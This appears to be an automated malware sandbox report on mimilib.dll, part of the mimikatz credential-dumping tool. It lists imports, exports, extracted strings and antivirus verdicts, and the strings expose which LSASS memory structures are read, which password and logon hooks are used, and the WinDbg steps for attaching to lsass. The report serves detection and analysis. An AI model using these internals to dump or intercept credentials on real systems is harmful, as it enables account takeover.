Static | ZeroBOX

PE Compile Time

2022-09-20 00:43:19

PE Imphash

721f5090ab31a091c5b9778028cc974c

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00001000       0x00003b8e    0x00003c00        6.28015740232
.rdata  0x00005000       0x00002515    0x00002600        5.14729948872
.data   0x00008000       0x000008a8    0x00000600        5.0413545347
.rsrc   0x00009000       0x00000430    0x00000600        2.51960820356
.reloc  0x0000a000       0x000009dc    0x00000a00        5.28028137994

Resources

Name        Offset      Size        Language      Sub-language        File type
RT_VERSION  0x00009060  0x000003cc  LANG_ENGLISH  SUBLANG_ENGLISH_US  data

Imports

Library ADVAPI32.dll:
0x10005000 CreateRestrictedToken
0x10005004 CreateProcessAsUserW
0x10005008 ConvertSidToStringSidA
0x1000500c IsTextUnicode
0x10005010 OpenProcessToken
Library ntdll.dll:
0x100050e4 RtlFreeUnicodeString
0x100050e8 RtlStringFromGUID
0x100050ec RtlEqualString
Library RPCRT4.dll:
0x1000509c NdrMesTypeDecode2
0x100050a0 NdrMesTypeFree2
0x100050a4 MesHandleFree
Library ole32.dll:
0x100050f4 CoCreateInstance
Library KERNEL32.dll:
0x1000501c GetCurrentProcessId
0x10005020 GetCurrentThreadId
0x10005024 GetTickCount
0x1000502c TerminateProcess
0x10005034 Sleep
0x10005038 RtlUnwind
0x10005040 GetCurrentProcess
0x10005044 CloseHandle
0x10005048 FreeLibrary
0x1000504c LoadLibraryW
0x10005050 lstrlenW
0x10005054 GetProcAddress
0x10005058 InterlockedIncrement
0x1000505c InterlockedDecrement
0x10005060 GetLastError
0x10005064 VirtualProtect
0x10005068 LocalAlloc
0x1000506c LocalFree
0x10005070 GetTimeFormatA
0x10005074 GetDateFormatA
0x10005078 FileTimeToSystemTime
0x10005080 RaiseException
0x10005084 InterlockedExchange
0x10005088 LoadLibraryA
Library msvcrt.dll:
0x100050ac fclose
0x100050b0 free
0x100050b4 malloc
0x100050b8 _stricmp
0x100050bc vfwprintf
0x100050c0 fflush
0x100050c4 memset
0x100050c8 memcpy
0x100050cc _XcptFilter
0x100050d0 _initterm
0x100050d4 _amsg_exit
0x100050d8 _wfopen
0x100050dc _except_handler3

Exports

Ordinal Address Name
1 0x1000111c DhcpNewPktHook
2 0x100010b4 DhcpServerCalloutEntry
3 0x1000186d DllCanUnloadNow
4 0x1000182d DllGetClassObject
5 0x1000119f DnsPluginCleanup
6 0x1000119a DnsPluginInitialize
7 0x100011a2 DnsPluginQuery
8 0x10002a56 ExtensionApiVersion
9 0x100011e0 InitializeChangeNotify
10 0x10001381 Msv1_0SubAuthenticationFilter
11 0x10001381 Msv1_0SubAuthenticationRoutine
12 0x1000129e NPGetCaps
13 0x10001234 NPLogonNotify
14 0x100011e3 PasswordChangeNotify
15 0x1000135e SpLsaModeInitialize
16 0x10002a5c WinDbgExtensionDllInit
17 0x10002a8d coffee
18 0x10002a9a mimikatz
19 0x10001000 startW

Strings

DhcpServerCalloutEntry
CredUnPackAuthenticationBufferW
CredIsProtectedW
CredUnprotectW
CredentialKeys
Primary
[%08x] %Z
n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)
n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)
* Key List
[%08x]
[%08x]
* GUID :
* Time :
* MasterKey :
\x%02x
0x%02x,
null
des_plain
des_cbc_crc
des_cbc_md4
des_cbc_md5
des_cbc_md5_nt
rc4_plain
rc4_plain2
rc4_plain_exp
rc4_lm
rc4_md4
rc4_sha
rc4_hmac_nt
rc4_hmac_nt_exp
rc4_plain_old
rc4_plain_old_exp
rc4_hmac_old
rc4_hmac_old_exp
aes128_hmac_plain
aes256_hmac_plain
aes128_hmac
aes256_hmac
unknow
[ERROR] [RPC Decode] Exception 0x%08x: (%u)
[ERROR] [RPC Decode] MesIncrementalHandleReset: %08x
[ERROR] [RPC Decode] MesDecodeIncrementalHandleCreate: %08x
[ERROR] [RPC Free] Exception 0x%08x: (%u)
[ERROR] [RPC Free] MesDecodeIncrementalHandleCreate: %08x
credman
dpapisrv!g_MasterKeyCacheList
lsasrv!g_MasterKeyCacheList
masterkey
msv1_0!SspCredentialList
kerberos!KerbGlobalLogonSessionTable
kerberos
livessp!LiveGlobalLogonSessionList
livessp
wdigest!l_LogSessList
wdigest
tspkg!TSGlobalCredTable
CachedUnlock
CachedRemoteInteractive
CachedInteractive
RemoteInteractive
NewCredentials
NetworkCleartext
Unlock
Service
Network
Interactive
Unknown !
UndefinedLogonType
.#####. mimikatz 2.2.0 (x86) built on Sep 19 2022 17:43:18
.## ^ ##. "A La Vie, A L'Amour" - Windows build %hu
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' WinDBG extension ! * * */
===================================
# * Kernel mode * #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
# * User mode * #
===================================
0:000> !mimikatz
===================================
( (
) )
.______.
| |]
\ /
`----'
lsasrv!LogonSessionLeakList
lsasrv!InitializationVector
lsasrv!hAesKey
lsasrv!h3DesKey
lsasrv!LogonSessionList
lsasrv!LogonSessionListCount
kdcsvc!SecData
krbtgt keys
===========
Current
Previous
SekurLSA
========
Authentication Id : %u ; %u (%08x:%08x)
Session : %s from %u
User Name : %wZ
Domain : %wZ
Logon Server : %wZ
Logon Time :
SID :
[ERROR] [LSA] Symbols
%p - lsasrv!LogonSessionListCount
%p - lsasrv!LogonSessionList
[ERROR] [CRYPTO] Acquire keys
[ERROR] [CRYPTO] Symbols
%p - lsasrv!InitializationVector
%p - lsasrv!hAesKey
%p - lsasrv!h3DesKey
[ERROR] [CRYPTO] Init
* Username : %wZ
* Domain : %wZ
* LM :
* NTLM :
* SHA1 :
* DPAPI :
* Raw data :
* Smartcard
PIN code : %wZ
Model : %S
Reader : %S
Key name : %S
Provider : %S
%s
<no size, buffer is incorrect>
Unknown version in Kerberos credentials structure
* Username : %wZ
* Domain : %wZ
* Password :
LUID KO
* RootKey :
* %08x :
* LSA Isolated Data: %.*s
Unk-Key :
Encrypted:
SS:%u, TS:%u, DS:%u
0:0x%x, 1:0x%x, 2:0x%x, 3:0x%x, 4:0x%x, E:
, 5:0x%x
* unkData1 :
unkData2 :
%s krbtgt:
%u credentials
* %s :
* RSA key
PVK (private key)
DER (public key and certificate)
* Legacy key
* Unknown key (seen as %08x)
lsasrv!g_guidPreferredKey
lsasrv!g_pbPreferredKey
lsasrv!g_cbPreferredKey
lsasrv!g_guidW2KPreferredKey
lsasrv!g_pbW2KPreferredKey
lsasrv!g_cbW2KPreferredKey
lsasrv!g_fSystemCredsInitialized
lsasrv!g_rgbSystemCredMachine
lsasrv!g_rgbSystemCredUser
dpapisrv!g_guidPreferredKey
dpapisrv!g_pbPreferredKey
dpapisrv!g_cbPreferredKey
dpapisrv!g_guidW2KPreferredKey
dpapisrv!g_pbW2KPreferredKey
dpapisrv!g_cbW2KPreferredKey
dpapisrv!g_fSystemCredsInitialized
dpapisrv!g_rgbSystemCredMachine
dpapisrv!g_rgbSystemCredUser
DPAPI Backup keys
=================
Current prefered key:
Compatibility prefered key:
DPAPI System
============
full:
m/u :
bcrypt.dll
BCryptOpenAlgorithmProvider
BCryptGenerateSymmetricKey
BCryptCloseAlgorithmProvider
BCryptDecrypt
BCryptSetProperty
BCryptDestroyKey
BCryptGetProperty
OpenProcessToken
CreateRestrictedToken
CreateProcessAsUserW
ConvertSidToStringSidA
IsTextUnicode
ADVAPI32.dll
RtlEqualString
RtlStringFromGUID
RtlFreeUnicodeString
ntdll.dll
MesDecodeIncrementalHandleCreate
MesHandleFree
MesIncrementalHandleReset
NdrMesTypeDecode2
NdrMesTypeFree2
RPCRT4.dll
CoCreateInstance
ole32.dll
GetCurrentProcess
CloseHandle
FreeLibrary
LoadLibraryW
lstrlenW
GetProcAddress
InterlockedIncrement
InterlockedDecrement
GetLastError
VirtualProtect
LocalAlloc
LocalFree
GetTimeFormatA
GetDateFormatA
FileTimeToSystemTime
FileTimeToLocalFileTime
RaiseException
InterlockedExchange
LoadLibraryA
KERNEL32.dll
_wfopen
fclose
malloc
_stricmp
vfwprintf
fflush
msvcrt.dll
memset
memcpy
_XcptFilter
_initterm
_amsg_exit
RtlUnwind
InterlockedCompareExchange
TerminateProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
_except_handler3
mimilib.dll
DhcpNewPktHook
DhcpServerCalloutEntry
DllCanUnloadNow
DllGetClassObject
DnsPluginCleanup
DnsPluginInitialize
DnsPluginQuery
ExtensionApiVersion
InitializeChangeNotify
Msv1_0SubAuthenticationFilter
Msv1_0SubAuthenticationRoutine
NPGetCaps
NPLogonNotify
PasswordChangeNotify
SpLsaModeInitialize
WinDbgExtensionDllInit
coffee
mimikatz
startW
kiwidns.log
%S (%hu)
kiwifilter.log
[%08x] %wZ
kiwinp.log
[%08x:%08x] %s %wZ\%wZ
KiwiSSP
Kiwi Security Support Provider
kiwissp.log
[%08x:%08x] [%08x] %wZ\%wZ (%wZ)
kiwisub.log
%u (%u) - %wZ\%wZ (%wZ) (%hu)
kcredentialprovider.log
Credui.dll
advapi32.dll
ChainingModeCBC
ChainingMode
ObjectLength
ChainingModeCFB
(null)
%02x%s
VS_VERSION_INFO
StringFileInfo
040904b0
ProductName
mimilib (mimikatz)
ProductVersion
2.2.0.0
CompanyName
gentilkiwi (Benjamin DELPY)
FileDescription
mimilib for Windows (mimikatz)
FileVersion
2.2.0.0
InternalName
mimilib
LegalCopyright
Copyright (c) 2007 - 2021 gentilkiwi (Benjamin DELPY)
OriginalFilename
mimilib.dll
PrivateBuild
Build with love for POC only
SpecialBuild
VarFileInfo
Translation
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Clean
tehtris Clean
ClamAV Win.Tool.Mimikatz-10030748-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh HTool-Mimikatz
ALYac Trojan.GenericKD.72711626
Cylance Unsafe
Zillya Tool.Mimikatz.Win32.1997
Sangfor HackTool.Win64.Mimikatz.uwccg
K7AntiVirus Riskware ( 005368931 )
Alibaba Trojan:Win32/Mimikatz.4b1
K7GW Riskware ( 005368931 )
Cybereason Clean
Baidu Clean
VirIT Trojan.Win32.Genus.RUJ
Paloalto generic.ml
Symantec Hacktool.Mimikatz
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/RiskWare.Mimikatz.J
APEX Clean
Avast Win32:MalwareX-gen [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Mimikatz.gen
BitDefender Trojan.GenericKD.72711626
NANO-Antivirus Trojan.Win32.Mimikatz.jritks
ViRobot HackTool.S.Mimikatz.31744
MicroWorld-eScan Trojan.GenericKD.72711626
Tencent Malware.Win32.Gencirc.10bd2aae
TACHYON Trojan/W32.Mimikatz.31744
Sophos ATK/Apteryx-Gen
F-Secure Trojan.TR/AD.Mimikatz.olrti
DrWeb Tool.PassView.1958
VIPRE Trojan.GenericKD.72711626
TrendMicro HackTool.Win32.Mimikatz.CNGF
McAfeeD ti!E60C210687E7
Trapmine Clean
FireEye Generic.mg.46e598798bdde4c7
Emsisoft Trojan.GenericKD.72711626 (B)
SentinelOne Static AI - Malicious PE
GData Trojan.GenericKD.72711626
Jiangmin Trojan.PSW.Mimikatz.cvz
Webroot W32.Hacktool.Gen
Varist W32/Mimikatz.A.gen!Eldorado
Avira TR/AD.Mimikatz.olrti
Antiy-AVL Trojan[PSW]/Win32.Mimikatz
Kingsoft malware.kb.a.797
Gridinsoft Risk.Win32.Mimikatz.tr
Xcitium Malware@#289lhzuorpj06
Arcabit Trojan.Generic.D4557DCA
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Mimikatz.gen
Microsoft HackTool:Win64/Mikatz!dha
Google Detected
AhnLab-V3 Trojan/Win.Mimikatz.R453144
Acronis Clean
McAfee HTool-Mimikatz
MAX malware (ai score=100)
VBA32 TrojanPSW.Mimikatz
Malwarebytes Mimikatz.Spyware.Stealer.DDS
Panda Trj/CI.A
Zoner Clean
TrendMicro-HouseCall HackTool.Win32.Mimikatz.CNGF
Rising HackTool.Mimikatz!1.B3A7 (CLASSIC)
Yandex Trojan.PWS.Mimikatz!Djq4AkBZt0I
Ikarus HackTool.Mimikatz
MaxSecure Trojan.Malware.102080579.susgen
Fortinet Riskware/Mimikatz
BitDefenderTheta Gen:NN.ZedlaF.36810.bu8@aC9ojzni
AVG Win32:MalwareX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)
alibabacloud HackTool:Win/Mimikatz.k
No IRMA results available.